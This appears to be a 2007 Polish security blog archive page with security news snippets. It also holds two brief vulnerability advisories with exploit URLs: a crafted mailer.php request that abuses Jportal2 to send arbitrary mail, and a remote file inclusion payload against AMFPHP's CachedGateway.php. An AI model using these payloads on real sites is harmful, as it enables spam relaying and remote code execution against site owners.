Archive for marzec, 2007
Podatne wersje: Jportal2 z modułem mailer.php
Blad wystepuje w pliku mailer.php, ktory nie sprawdza czy adres e-mail podany w zmiennej $to jest na liscie e-mail’i portalu.
Najprostsza metoda wykorzystania jest spreparowanie adresu URL
http://adres.strony.com/mailer.php?to=adres@email.com&subject=TestExploita&
from_name=Admin&from_mail=admin@adres.com&body=TestExploita&ok=wyslij&cmd=sendmail
Takie proste wyexploitowanie jest mozliwe dzieki temu, ze Jportal nie sprawdza czy zmienna jest z tablicy POST czy GET.
Jesli, jednak ktorys admin pokusilby sie o [...]
Filed under: Bez kategorii | Leave a Comment
Joanna Rutkowska, specjalistka ds. zabezpieczeń, zaprezentowała kilka różnych metod, za pomocą których wyspecjalizowane rootkity mogą oszukać nawet najlepsze dostępne obecnie mechanizmy obronne.
Rutkowska zaprezentowała wyniki swoich badań podczas poświęconej komputerowemu bezpieczeństwu konferencji Black Hat w Arlington, w stanie Virginia. Z jej prezentacji wynika, iż jeśli rootkit jest wystarczająco zaawansowany, aktualnie nie ma całkowicie skutecznej metody jego [...]
Filed under: Virii | Leave a Comment
# Java bezpieczniejsza niż C/C++
Projekty open-source’owe napisane w Javie zawierają mniej błędów niż aplikacje napisane w innych językach – wynika z badań przeprowadzonych przez firmę Fortify Software, zajmującą się audytem oprogramowania. Nie oznacza to jednak, że oprogramowanie pisane w Javie jest wolne od usterek – specjaliści z Fortify Software twierdzą, iż w zbadanych przez nich próbkach kodu napisanego w [...]
Filed under: Security IT | Leave a Comment
# Atak na bloga
Użytkownicy, którzy pobrali system obsługi blogów WordPress w wersji 2.1.1, powinni niezwłocznie pobrać najnowszą edycję oznaczoną numerem 2.1.2.
Okazuje się, że serwer projektu został zaatakowany, a cyberprzestępcy podmienili wersję 2.1.1 spreparowanym przez siebie oprogramowaniem zawierającym tylne drzwi ułatwiające infiltrację kodu PHP.
Autorzy systemu nie podali szczegółów włamania na serwer, ujawnili jedynie o niebezpieczeństwie, jakie niesie za sobą [...]
Filed under: Bez kategorii | Leave a Comment
Atak był skuteczny. Padły dwa serwery, w tym jeden o nazwie “LEW”. Skutki odczuli ludzie i instytucje w całym regionie. W koszalińskim ratuszu nie działa poczta elektroniczna, a strona internetowa miejskiej komendy policji jest zamknięta.
- Nasz serwer “LEW”, do którego podłączonych jest wiele instytucji, miał być potężny i chyba dlatego informatycy nazwali go mianem króla [...]
Filed under: Ataki (hack) | Leave a Comment
Poziom Ataku: Bardzo Krytyczny
Typ Ataku : Zdalny
Autor: Crackers_Child
Kontakt: crackers_child (at) sibersavascilar (dot) com
Błąd występuje w pliku CachedGateway.php:
include_once(“app/Gateway.ph p”);
include_once(AMFPHP_BASE . “custom/CachedExecutionAction.php”);
Kod nadużycia:
www.atakowana.strona.pl/adobe_php_sdk_path/librar ies/amfphp/amf-core/custom/CachedG
ateway.php?AMFPHP_BASE=sh3ll?_
Filed under: Bugtraq | Leave a Comment
